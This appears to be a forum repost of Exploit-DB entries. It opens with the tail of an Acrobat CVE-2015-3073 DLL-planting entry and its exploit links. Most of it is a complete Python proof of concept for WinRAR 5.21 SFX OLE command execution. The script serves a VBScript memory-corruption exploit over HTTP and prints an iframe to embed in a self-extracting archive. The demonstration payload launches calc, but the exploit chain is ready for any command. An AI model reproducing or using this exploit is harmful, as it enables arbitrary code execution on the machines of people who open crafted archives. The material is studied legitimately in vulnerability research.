Notes: The code assumes you attached a DLL named exploit.txt to the PDF document to get around attachment security restrictions. Acrobat will execute updaternotifications.dll if it's in the same directory as the Acrobat executable or the same directory as the document being opened. Credit for discovery and the initial POC that illustrates code being executed in the privileged context (launching a URL) goes to the Zero Day Initiative.

Code:
https://github.com/reigningshells/CVE-2015-3073/blob/master/exploit.js
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38344.zip

Source: https://www.exploit-db.com/exploits/38344/
-
[h=1]WinRar 5.21 - SFX OLE Command Execution[/h]

```python
#!/usr/bin/python -w
# Title : WinRar SFX OLE Command Execution
# Date : 25/09/2015
# Author : R-73eN
# Tested on : Windows Xp SP3 with WinRAR 5.21
#
# Triggering the Vulnerability
# Run this python script
# Right click a file and then click on add to archive.
# check the 'Create SFX archive' box
# go to Advanced tab
# go to SFX options
# go to Text And icon
# copy the code that the script will generate to 'Text to display into sfx windows'
# Click OK two times and the sfx archive is generated.
# If someone opens that sfx archive a calculator should pop up.
#
# Video : https://youtu.be/vIslLJYvnaM
#
banner = ""
banner +=" ___ __ ____ _ _ \n"
banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n"
banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n"
banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n"
banner +=" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|\n\n"
print banner

import socket

CRLF = "\r\n"

#OLE command execution
exploit = """<html>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
<head>
</head>
<body>
<SCRIPT LANGUAGE="VBScript">
function runmumaa()
On Error Resume Next
set shell=createobject("Shell.Application")
shell.ShellExecute "calc.exe", "runas", 0
end function
</script>
<SCRIPT LANGUAGE="VBScript">
dim aa()
dim ab()
dim a0
dim a1
dim a2
dim a3
dim win9x
dim intVersion
dim rnda
dim funclass
dim myarray
Begin()
function Begin()
On Error Resume Next
info=Navigator.UserAgent
if(instr(info,"Win64")>0) then
exit function
end if
if (instr(info,"MSIE")>0) then
intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2))
else
exit function
end if
win9x=0
BeginInit()
If Create()=True Then
myarray= chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)
myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)
if(intVersion<4) then
document.write("<br> IE")
document.write(intVersion)
runshellcode()
else
setnotsafemode()
end if
end if
end function
function BeginInit()
Randomize()
redim aa(5)
redim ab(5)
a0=13+17*rnd(6)
a3=7+3*rnd(5)
end function
function Create()
On Error Resume Next
dim i
Create=False
For i = 0 To 400
If Over()=True Then
Create=True
Exit For
End If
Next
end function
sub testaa()
end sub
function mydata()
On Error Resume Next
i=testaa
i=null
redim Preserve aa(a2)
ab(0)=0
aa(a1)=i
ab(0)=6.36598737437801E-314
aa(a1+2)=myarray
ab(2)=1.74088534731324E-310
mydata=aa(a1)
redim Preserve aa(a0)
end function
function setnotsafemode()
On Error Resume Next
i=mydata()
i=rum(i+8)
i=rum(i+16)
j=rum(i+&h134)
for k=0 to &h60 step 4
j=rum(i+&h120+k)
if(j=14) then
j=0
redim Preserve aa(a2)
aa(a1+2)(i+&h11c+k)=ab(4)
redim Preserve aa(a0)
j=0
j=rum(i+&h120+k)
Exit for
end if
next
ab(2)=1.69759663316747E-313
runmumaa()
end function
function Over()
On Error Resume Next
dim type1,type2,type3
Over=False
a0=a0+a3
a1=a0+2
a2=a0+&h8000000
redim Preserve aa(a0)
redim ab(a0)
redim Preserve aa(a2)
type1=1
ab(0)=1.123456789012345678901234567890
aa(a0)=10
If(IsObject(aa(a1-1)) = False) Then
if(intVersion<4) then
mem=cint(a0+1)*16
j=vartype(aa(a1-1))
if((j=mem+4) or (j*8=mem+8)) then
if(vartype(aa(a1-1))<>0) Then
If(IsObject(aa(a1)) = False ) Then
type1=VarType(aa(a1))
end if
end if
else
redim Preserve aa(a0)
exit function
end if
else
if(vartype(aa(a1-1))<>0) Then
If(IsObject(aa(a1)) = False ) Then
type1=VarType(aa(a1))
end if
end if
end if
end if
If(type1=&h2f66) Then
Over=True
End If
If(type1=&hB9AD) Then
Over=True
win9x=1
End If
redim Preserve aa(a0)
end function
function rum(add)
On Error Resume Next
redim Preserve aa(a2)
ab(0)=0
aa(a1)=add+4
ab(0)=1.69759663316747E-313
rum=lenb(aa(a1))
ab(0)=0
redim Preserve aa(a0)
end function
</script>
</body>
</html>"""

response = "HTTP/1.1 200 OK" + CRLF + "Content-Type: text/html" + CRLF + "Connection: close" + CRLF + "Server: Apache" + CRLF + "Content-Length: " + str(len(exploit)) + CRLF + CRLF + exploit + CRLF

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
host = raw_input("Enter Local IP: ")
server_address = (host, 8080)
sock.bind(server_address)
print "[+] Server started " + host + " [+]"
sock.listen(1)
print "[+] Insert this code on the 'Text to display into sfx windows' [+]"
print "\n<iframe src='http://" + host + ":8080/'> </iframe>"
print "\n[+] Waiting for request . . . [+]"
connection, client_address = sock.accept()
while True:
    connection.recv(2048)
    print "[+] Got request , sending exploit . . .[+]"
    connection.send(exploit)
    print "[+] Exploit sent , A calc should pop up . . [+]"
    print "\nhttps://www.infogen.al/\n"
    exit(0)
```

Source: https://www.exploit-db.com/exploits/38319/